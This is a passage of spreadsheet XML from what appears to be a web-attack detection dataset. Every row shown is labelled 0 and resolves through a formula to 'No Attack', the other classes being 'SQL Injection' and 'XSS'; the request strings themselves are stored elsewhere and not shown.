        <v>0</v>
      </c>
      <c r="C32000" s="7" t="str">
        <f t="shared" si="499"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32001" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32001" s="1" t="s">
        <v>29570</v>
      </c>
      <c r="B32001">
        <v>0</v>
      </c>
      <c r="C32001" s="7" t="str">
        <f t="shared" si="499"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32002" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32002" s="1" t="s">
        <v>32277</v>
      </c>
      <c r="B32002">
        <v>0</v>
      </c>
      <c r="C32002" s="7" t="str">
        <f t="shared" si="499"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32003" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32003" s="1" t="s">
        <v>28595</v>
      </c>
      <c r="B32003">
        <v>0</v>
      </c>
      <c r="C32003" s="7" t="str">
        <f t="shared" ref="C32003:C32066" si="500">IF(B32003=0,"No Attack", IF(B32003=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32004" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32004" s="1" t="s">
        <v>22658</v>
      </c>
      <c r="B32004">
        <v>0</v>
      </c>
      <c r="C32004" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32005" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32005" s="1" t="s">
        <v>23245</v>
      </c>
      <c r="B32005">
        <v>0</v>
      </c>
      <c r="C32005" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32006" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32006" s="1" t="s">
        <v>35815</v>
      </c>
      <c r="B32006">
        <v>0</v>
      </c>
      <c r="C32006" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32007" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32007" s="1" t="s">
        <v>37214</v>
      </c>
      <c r="B32007">
        <v>0</v>
      </c>
      <c r="C32007" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32008" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32008" s="1" t="s">
        <v>30800</v>
      </c>
      <c r="B32008">
        <v>0</v>
      </c>
      <c r="C32008" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32009" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32009" s="1" t="s">
        <v>23458</v>
      </c>
      <c r="B32009">
        <v>0</v>
      </c>
      <c r="C32009" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32010" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32010" s="1" t="s">
        <v>34426</v>
      </c>
      <c r="B32010">
        <v>0</v>
      </c>
      <c r="C32010" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32011" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32011" s="1" t="s">
        <v>30628</v>
      </c>
      <c r="B32011">
        <v>0</v>
      </c>
      <c r="C32011" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32012" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32012" s="1" t="s">
        <v>23597</v>
      </c>
      <c r="B32012">
        <v>0</v>
      </c>
      <c r="C32012" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32013" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32013" s="1" t="s">
        <v>36867</v>
      </c>
      <c r="B32013">
        <v>0</v>
      </c>
      <c r="C32013" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32014" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32014" s="1" t="s">
        <v>35273</v>
      </c>
      <c r="B32014">
        <v>0</v>
      </c>
      <c r="C32014" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32015" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32015" s="1" t="s">
        <v>28225</v>
      </c>
      <c r="B32015">
        <v>0</v>
      </c>
      <c r="C32015" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32016" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32016" s="1" t="s">
        <v>21524</v>
      </c>
      <c r="B32016">
        <v>0</v>
      </c>
      <c r="C32016" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32017" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32017" s="1" t="s">
        <v>31627</v>
      </c>
      <c r="B32017">
        <v>0</v>
      </c>
      <c r="C32017" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32018" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32018" s="1" t="s">
        <v>34451</v>
      </c>
      <c r="B32018">
        <v>0</v>
      </c>
      <c r="C32018" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32019" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32019" s="1" t="s">
        <v>21414</v>
      </c>
      <c r="B32019">
        <v>0</v>
      </c>
      <c r="C32019" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32020" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32020" s="1" t="s">
        <v>22369</v>
      </c>
      <c r="B32020">
        <v>0</v>
      </c>
      <c r="C32020" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32021" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32021" s="1" t="s">
        <v>37292</v>
      </c>
      <c r="B32021">
        <v>0</v>
      </c>
      <c r="C32021" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32022" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32022" s="1" t="s">
        <v>21987</v>
      </c>
      <c r="B32022">
        <v>0</v>
      </c>
      <c r="C32022" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32023" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32023" s="1" t="s">
        <v>33838</v>
      </c>
      <c r="B32023">
        <v>0</v>
      </c>
      <c r="C32023" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32024" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32024" s="1" t="s">
        <v>27011</v>
      </c>
      <c r="B32024">
        <v>0</v>
      </c>
      <c r="C32024" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32025" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32025" s="1" t="s">
        <v>34704</v>
      </c>
      <c r="B32025">
        <v>0</v>
      </c>
      <c r="C32025" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32026" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32026" s="1" t="s">
        <v>28365</v>
      </c>
      <c r="B32026">
        <v>0</v>
      </c>
      <c r="C32026" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32027" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32027" s="1" t="s">
        <v>20519</v>
      </c>
      <c r="B32027">
        <v>0</v>
      </c>
      <c r="C32027" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32028" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32028" s="1" t="s">
        <v>34424</v>
      </c>
      <c r="B32028">
        <v>0</v>
      </c>
      <c r="C32028" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32029" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32029" s="1" t="s">
        <v>28037</v>
      </c>
      <c r="B32029">
        <v>0</v>
      </c>
      <c r="C32029" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32030" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32030" s="1" t="s">
        <v>37460</v>
      </c>
      <c r="B32030">
        <v>0</v>
      </c>
      <c r="C32030" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32031" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32031" s="1" t="s">
        <v>36714</v>
      </c>
      <c r="B32031">
        <v>0</v>
      </c>
      <c r="C32031" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32032" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32032" s="1" t="s">
        <v>27537</v>
      </c>
      <c r="B32032">
        <v>0</v>
      </c>
      <c r="C32032" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32033" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32033" s="1" t="s">
        <v>35800</v>
      </c>
      <c r="B32033">
        <v>0</v>
      </c>
      <c r="C32033" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32034" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32034" s="1" t="s">
        <v>29995</v>
      </c>
      <c r="B32034">
        <v>0</v>
      </c>
      <c r="C32034" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32035" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32035" s="1" t="s">
        <v>32971</v>
      </c>
      <c r="B32035">
        <v>0</v>
      </c>
      <c r="C32035" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32036" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32036" s="1" t="s">
        <v>31107</v>
      </c>
      <c r="B32036">
        <v>0</v>
      </c>
      <c r="C32036" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32037" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32037" s="1" t="s">
        <v>29499</v>
      </c>
      <c r="B32037">
        <v>0</v>
      </c>
      <c r="C32037" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32038" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32038" s="1" t="s">
        <v>29760</v>
      </c>
      <c r="B32038">
        <v>0</v>
      </c>
      <c r="C32038" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32039" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32039" s="1" t="s">
        <v>21285</v>
      </c>
      <c r="B32039">
        <v>0</v>
      </c>
      <c r="C32039" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32040" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32040" s="1" t="s">
        <v>31517</v>
      </c>
      <c r="B32040">
        <v>0</v>
      </c>
      <c r="C32040" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32041" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32041" s="1" t="s">
        <v>32437</v>
      </c>
      <c r="B32041">
        <v>0</v>
      </c>
      <c r="C32041" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32042" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32042" s="1" t="s">
        <v>22962</v>
      </c>
      <c r="B32042">
        <v>0</v>
      </c>
      <c r="C32042" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32043" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32043" s="1" t="s">
        <v>31765</v>
      </c>
      <c r="B32043">
        <v>0</v>
      </c>
      <c r="C32043" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32044" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32044" s="1" t="s">
        <v>30219</v>
      </c>
      <c r="B32044">
        <v>0</v>
      </c>
      <c r="C32044" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32045" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32045" s="1" t="s">
        <v>30981</v>
      </c>
      <c r="B32045">
        <v>0</v>
      </c>
      <c r="C32045" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32046" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32046" s="1" t="s">
        <v>35083</v>
      </c>
      <c r="B32046">
        <v>0</v>
      </c>
      <c r="C32046" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32047" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32047" s="1" t="s">
        <v>20705</v>
      </c>
      <c r="B32047">
        <v>0</v>
      </c>
      <c r="C32047" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32048" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32048" s="1" t="s">
        <v>21153</v>
      </c>
      <c r="B32048">
        <v>0</v>
      </c>
      <c r="C32048" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32049" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32049" s="1" t="s">
        <v>31546</v>
      </c>
      <c r="B32049">
        <v>0</v>
      </c>
      <c r="C32049" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32050" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32050" s="1" t="s">
        <v>31459</v>
      </c>
      <c r="B32050">
        <v>0</v>
      </c>
      <c r="C32050" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32051" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32051" s="1" t="s">
        <v>21436</v>
      </c>
      <c r="B32051">
        <v>0</v>
      </c>
      <c r="C32051" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32052" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32052" s="1" t="s">
        <v>30310</v>
      </c>
      <c r="B32052">
        <v>0</v>
      </c>
      <c r="C32052" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32053" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32053" s="1" t="s">
        <v>23834</v>
      </c>
      <c r="B32053">
        <v>0</v>
      </c>
      <c r="C32053" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32054" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32054" s="1" t="s">
        <v>23636</v>
      </c>
      <c r="B32054">
        <v>0</v>
      </c>
      <c r="C32054" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32055" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32055" s="1" t="s">
        <v>35980</v>
      </c>
      <c r="B32055">
        <v>0</v>
      </c>
      <c r="C32055" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32056" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32056" s="1" t="s">
        <v>35327</v>
      </c>
      <c r="B32056">
        <v>0</v>
      </c>
      <c r="C32056" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32057" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32057" s="1" t="s">
        <v>32856</v>
      </c>
      <c r="B32057">
        <v>0</v>
      </c>
      <c r="C32057" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32058" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32058" s="1" t="s">
        <v>29604</v>
      </c>
      <c r="B32058">
        <v>0</v>
      </c>
      <c r="C32058" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32059" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32059" s="1" t="s">
        <v>31961</v>
      </c>
      <c r="B32059">
        <v>0</v>
      </c>
      <c r="C32059" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32060" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32060" s="1" t="s">
        <v>26967</v>
      </c>
      <c r="B32060">
        <v>0</v>
      </c>
      <c r="C32060" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32061" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32061" s="1" t="s">
        <v>21499</v>
      </c>
      <c r="B32061">
        <v>0</v>
      </c>
      <c r="C32061" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32062" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32062" s="1" t="s">
        <v>29083</v>
      </c>
      <c r="B32062">
        <v>0</v>
      </c>
      <c r="C32062" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32063" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32063" s="1" t="s">
        <v>30425</v>
      </c>
      <c r="B32063">
        <v>0</v>
      </c>
      <c r="C32063" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32064" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32064" s="1" t="s">
        <v>27621</v>
      </c>
      <c r="B32064">
        <v>0</v>
      </c>
      <c r="C32064" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32065" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32065" s="1" t="s">
        <v>31748</v>
      </c>
      <c r="B32065">
        <v>0</v>
      </c>
      <c r="C32065" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32066" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32066" s="1" t="s">
        <v>31455</v>
      </c>
      <c r="B32066">
        <v>0</v>
      </c>
      <c r="C32066" s="7" t="str">
        <f t="shared" si="500"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32067" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32067" s="1" t="s">
        <v>11020</v>
      </c>
      <c r="B32067">
        <v>0</v>
      </c>
      <c r="C32067" s="7" t="str">
        <f t="shared" ref="C32067:C32130" si="501">IF(B32067=0,"No Attack", IF(B32067=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32068" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32068" s="1" t="s">
        <v>11021</v>
      </c>
      <c r="B32068">
        <v>0</v>
      </c>
      <c r="C32068" s="7" t="str">
        <f t="shared" si="501"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32069" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32069" s="1" t="s">
        <v>23567</v>
      </c>
      <c r="B32069">
        <v>0</v>
      </c>
      <c r="C32069" s="7" t="str">
        <f t="shared" si="501"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32070" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32070" s="1" t="s">
        <v>37085</v>
      </c>
      <c r="B32070">
        <v>0</v>
      </c>
      <c r="C32070" s="7" t="str">
        <f t="shared" si="501"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32071" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32071" s="1" t="s">
        <v>22518</v>
      </c>
      <c r="B32071">
        <v>0</v>
      </c>
      <c r="C32071" s="7" t="str">
        <f t="shared" si="501"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32072" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32072" s="1" t="s">
        <v>31878</v>
      </c>
      <c r="B32072">
        <v>0</v>
      </c>
      <c r="C32072" s="7" t="str">
        <f t="shared" si="501"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32073" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32073" s="1" t="s">
        <v>27379</v>
      </c>
      <c r="B32073">
        <v>0</v>
      </c>
      <c r="C32073" s="7" t="str">
        <f t="shared" si="501"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32074" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32074" s="1" t="s">
        <v>34757</v>
      </c>
      <c r="B32074">
        <v>0</v>
      </c>
      <c r="C32074" s="7" t="str">
        <f t="shared" si="501"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32075" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32075" s="1" t="s">
        <v>30613</v>
      </c>
      <c r="B32075">
        <v>0</v>
      </c>
      <c r="C32075" s="7" t="str">
        <f t="shared" si="501"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32076" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32076" s="1" t="s">
        <v>30286</v>
      </c>
      <c r="B32076">
        <v>0</v>
      </c>
      <c r="C32076" s="7" t="str">
        <f t="shared" si="501"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32077" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32077" s="1" t="s">
        <v>27272</v>
      </c>
      <c r="B32077">
        <v>0</v>
      </c>
      <c r="C32077" s="7" t="str">
        <f t="shared" si="501"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32078" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32078" s="1" t="s">
        <v>21457</v>
      </c>
      <c r="B32078">
        <v>0</v>
      </c>
      <c r="C32078" s="7" t="str">
        <f t="shared" si="501"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32079" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32079" s="1" t="s">
        <v>33367</v>
      </c>
      <c r="B32079">
        <v>0</v>
      </c>
      <c r="C32079" s="7" t="str">
        <f t="shared" si="501"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32080" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32080" s="1" t="s">
        <v>22764</v>
      </c>
      <c r="B32080">
        <v>0</v>
      </c>
      <c r="C32080" s="7" t="str">
        <f t="shared" si="501"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32081" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32081" s="1" t="s">
        <v>37075</v>
      </c>
      <c r="B32081">
        <v>0</v>
      </c>
      <c r="C32081" s="7" t="str">
        <f t="shared" si="501"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32082" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32082" s="1" t="s">
        <v>31105</v>
      </c>
      <c r="B32082">
        <v>0</v>
      </c>
      <c r="C32082" s="7" t="str">
        <f t="shared" si="501"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32083" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32083" s="1" t="s">
        <v>34905</v>
      </c>
      <c r="B32083">
        <v>0</v>
      </c>
      <c r="C32083" s="7" t="str">
        <f t="shared" si="501"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32084" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32084" s="1" t="s">
        <v>29680</v>
      </c>
      <c r="B32084">
        <v>0</v>
      </c>
      <c r="C32084" s="7" t="str">
        <f t="shared" si="501"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32085" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32085" s="1" t="s">
        <v>27851</v>
      </c>
      <c r="B32085">
        <v>0</v>
      </c>
      <c r="C32085" s="7" t="str">
        <f t="shared" si="501"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32086" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32086" s="1" t="s">
        <v>27482</v>
      </c>
      <c r="B32086">
        <v>0</v>
      </c>
      <c r="C32086" s="7" t="str">
        <f t="shared" si="501"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32087" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32087" s="1" t="s">
        <v>28607</v>
      </c>
      <c r="B32087">
        <v>0</v>
      </c>
      <c r="C32087" s="7" t="str">
        <f t="shared" si="501"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32088" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32088" s="1" t="s">
        <v>20525</v>
      </c>
      <c r="B32088">
        <v>0</v>
      </c>
      <c r="C32088" s="7" t="str">
        <f t="shared" si="501"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32089" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32089" s="1" t="s">
        <v>22474</v>
      </c>
      <c r="B32089">
        <v>0</v>
      </c>
      <c r="C32089" s="7" t="str">
        <f t="shared" si="501"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32090" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32090" s="1" t="s">
        <v>27196</v>
      </c>
      <c r="B32090">
        <v>0</v>
      </c>
      <c r="C32090" s="7" t="str">
        <f t="shared" si="501"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32091" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32091" s="1" t="s">
        <v>34292</v>
      </c>
      <c r="B32091">
        <v>0</v>
      </c>
      <c r="C32091" s="7" t="str">
        <f t="shared" si="501"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32092" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32092" s="1" t="s">
        <v>28604</v>
      </c>
      <c r="B32092">
        <v>0</v>
      </c>
      <c r="C32092" s="7" t="str">
        <f t="shared" si="501"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32093" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32093" s="1" t="s">
        <v>31176</v>
      </c>
      <c r="B32093">
        <v>0</v>
      </c>
      <c r="C32093" s="7" t="str">
        <f t="shared" si="501"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32094" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32094" s="1" t="s">
        <v>20055</v>
      </c>
      <c r="B32094">
        <v>0</v>
      </c>
      <c r="C32094" s="7" t="str">
        <f t="shared" si="501"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32095" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32095" s="1" t="s">
        <v>28099</v>
      </c>
      <c r="B32095">
        <v>0</v>
      </c>
      <c r="C32095" s="7" t="str">
        <f t="shared" si="501"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32096" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32096" s="1" t="s">
        <v>24345</v>
      </c>
      <c r="B32096">
        <v>0</v>
      </c>
      <c r="C32096" s="7" t="str">
        <f t="shared" si="501"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32097" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32097" s="1" t="s">
        <v>20434</v>
      </c>
      <c r="B32097">
        <v>0</v>
      </c>
      <c r="C32097" s="7" t="str">
        <f t="shared" si="501"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32098" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32098" s="1" t="s">
        <v>27073</v>
      </c>
      <c r="B32098">
        <v>0</v>
      </c>
      <c r="C32098" s="7" t="str">
        <f t="shared" si="501"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32099" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32099" s="1" t="s">
        <v>22132</v>
      </c>
      <c r="B32099">
        <v>0</v>
      </c>
      <c r="C32099" s="7" t="str">
        <f t="shared" si="501"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32100" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32100" s="1" t="s">
        <v>32164</v>
      </c>
      <c r="B32100">
        <v>0</v>
      </c>
      <c r="C32100" s="7" t="str">
        <f t="shared" si="501"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32101" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32101" s="1" t="s">
        <v>35838</v>
      </c>
      <c r="B32101">
        <v>0</v>
      </c>
      <c r="C32101" s="7" t="str">
        <f t="shared" si="501"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32102" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32102" s="1" t="s">
        <v>27512</v>
      </c>
      <c r="B32102">
        <v>0</v>
      </c>
      <c r="C32102" s="7" t="str">
        <f t="shared" si="501"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32103" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32103" s="1" t="s">
        <v>21326</v>
      </c>
      <c r="B32103">
        <v>0</v>
      </c>
      <c r="C32103" s="7" t="str">
        <f t="shared" si="501"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32104" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32104" s="1" t="s">
        <v>26953</v>
      </c>
      <c r="B32104">
        <v>0</v>
      </c>
